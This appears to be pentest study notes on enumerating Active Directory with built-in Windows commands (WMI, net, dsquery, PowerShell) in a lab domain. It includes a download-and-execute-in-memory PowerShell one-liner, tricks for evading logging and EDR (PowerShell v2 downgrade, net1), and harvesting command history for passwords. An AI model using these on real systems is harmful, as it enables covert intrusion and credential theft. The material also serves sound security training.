Living Off the Land
Techniques for AD enumeration using only native Windows tools and commands — no imported tools required. Useful when you cannot load tools onto a managed host, have no internet access, or need to stay stealthy. Native commands generate fewer logs and alerts compared to pulling offensive tools into the environment.
Host & Network Reconnaissance
Basic Enumeration Commands
| Command | Result |
|---|---|
hostname | PC name |
[System.Environment]::OSVersion.Version | OS version and revision |
wmic qfe get Caption,Description,HotFixID,InstalledOn | Patches and hotfixes |
ipconfig /all | Network adapter config |
set | Environment variables (CMD) |
echo %USERDOMAIN% | Domain name (CMD) |
echo %logonserver% | Domain controller name (CMD) |
systeminfo | All of the above in one command (fewer logs) |
Network Enumeration
| Command | Purpose |
|---|---|
arp -a | Known hosts in ARP table — reveals local network hosts |
ipconfig /all | Adapter settings and network segment |
route print | Routing table — known networks and potential lateral movement paths |
netsh advfirewall show allprofiles | Firewall status for all profiles (Domain/Private/Public) |
Networks in the routing table are potential lateral movement targets — they’re either actively used or administratively configured.
Check Who Else is Logged In
qwinsta
Always check before taking action — if another user notices unusual activity, they may report it or change their password.
PowerShell Techniques
Useful Cmdlets
| Cmdlet | Purpose |
|---|---|
Get-Module | List loaded modules (check for AD module, custom scripts) |
Get-ExecutionPolicy -List | Execution policy per scope |
Set-ExecutionPolicy Bypass -Scope Process | Bypass execution policy for current process only (reverts on exit) |
Get-ChildItem Env: | ft Key,Value | Environment variables |
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt | PowerShell command history (may contain passwords) |
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL')" | Download and execute from memory |
PowerShell Downgrade for Evasion
PowerShell event logging (Script Block Logging) was introduced in PowerShell 3.0. Downgrading to version 2.0 disables logging for that session:
powershell.exe -version 2
Get-host # Verify version shows 2.0
Caveats:
- The command
powershell.exe -version 2itself is logged - After downgrade, no further Script Block Logging entries are created
- A vigilant defender may notice logging gaps and investigate
- Requires .NET Framework 2.0 to be installed on the host
Checking Defenses
Firewall Status
netsh advfirewall show allprofiles
Check the State field — ON or OFF for each profile (Domain, Private, Public).
Windows Defender
sc query windefend
Get-MpComputerStatus
Key fields: RealTimeProtectionEnabled, AntivirusEnabled, BehaviorMonitorEnabled, IsTamperProtected, scan schedules, signature age.
WMI (Windows Management Instrumentation)
Scripting engine for retrieving system info from local and remote hosts.
Useful WMI Commands
| Command | Purpose |
|---|---|
wmic qfe get Caption,Description,HotFixID,InstalledOn | Patch level |
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List | Host info |
wmic process list /format:list | Running processes |
wmic ntdomain list /format:list | Domain and DC info (includes trusts) |
wmic useraccount list /format:list | Local and domain accounts that have logged in |
wmic group list /format:list | Local groups |
wmic sysaccount list /format:list | System/service accounts |
Domain and Trust Enumeration via WMI
wmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress
Reveals the current domain, child domains, and external forest trusts with DC addresses.
Net Commands
Built-in commands for user, group, host, and share enumeration. Note: net.exe commands are commonly monitored by EDR — use with caution.
Evasion Tip
Use net1 instead of net — executes the same functions but may avoid string-based detection triggers:
net1 user /domain
net1 group /domain
Key Commands
| Command | Purpose |
|---|---|
net accounts /domain | Password and lockout policy |
net user /domain | All domain users |
net user <username> /domain | Specific user details |
net group /domain | All domain groups |
net group "Domain Admins" /domain | DA members |
net group "domain computers" /domain | Domain-joined computers |
net group "Domain Controllers" /domain | DCs |
net localgroup | All local groups |
net localgroup administrators | Local admin members |
net share | Current shares |
net view | List of domain computers |
net view /domain | Shares on the domain |
net view \\computer /ALL | All shares on a computer |
Dsquery
Command-line tool for querying AD objects. Available on any host with AD Domain Services Role installed. The dsquery.dll exists on all modern Windows systems at C:\Windows\System32\dsquery.dll. Requires elevated privileges or SYSTEM context.
Basic Queries
dsquery user
dsquery computer
dsquery group
dsquery ou
Wildcard Search (List All Objects in an OU)
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
LDAP Filter Queries
Users with PASSWD_NOTREQD Flag
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
Find Domain Controllers
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
LDAP OID Matching Rules
| OID | Rule | Use Case |
|---|---|---|
1.2.840.113556.1.4.803 | Bitwise AND — all bits must match | Match a single specific attribute |
1.2.840.113556.1.4.804 | Bitwise OR — any bit match | Match any of several attributes |
1.2.840.113556.1.4.1941 | Chain match (LDAP_MATCHING_RULE_IN_CHAIN) | Search through DN ownership/membership |
LDAP Logical Operators
| Operator | Meaning | Example |
|---|---|---|
& | AND | (&(objectClass=user)(adminCount=1)) |
| | OR | (|(objectClass=user)(objectClass=computer)) |
! | NOT | (&(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=64)) |
Common UAC Bitmask Values
| Decimal | Hex | Attribute |
|---|---|---|
| 2 | 0x0002 | Account is disabled |
| 8 | 0x0008 | Home directory required |
| 16 | 0x0010 | Account locked out |
| 32 | 0x0020 | Password not required |
| 64 | 0x0040 | Password can’t change |
| 512 | 0x0200 | Normal account |
| 8192 | 0x2000 | Server trust account (Domain Controller) |
| 65536 | 0x10000 | Password doesn’t expire |
| 4194304 | 0x400000 | Don’t require pre-auth (AS-REP roastable) |
| 524288 | 0x80000 | Trusted for delegation |
Summary
| Tool | Type | Best For |
|---|---|---|
systeminfo | Built-in | Quick host overview in one command |
| PowerShell cmdlets | Built-in | Module discovery, environment enum, history pillaging |
| PS downgrade (v2) | Evasion | Bypass Script Block Logging |
netsh / sc | Built-in | Firewall and Defender status |
WMI (wmic) | Built-in | Domain/trust/process/user enumeration |
net / net1 | Built-in | User, group, share, policy enumeration |
dsquery | Built-in | LDAP-based AD queries with filter support |
qwinsta | Built-in | Check for other logged-in users |
arp -a / route print | Built-in | Network discovery and lateral movement paths |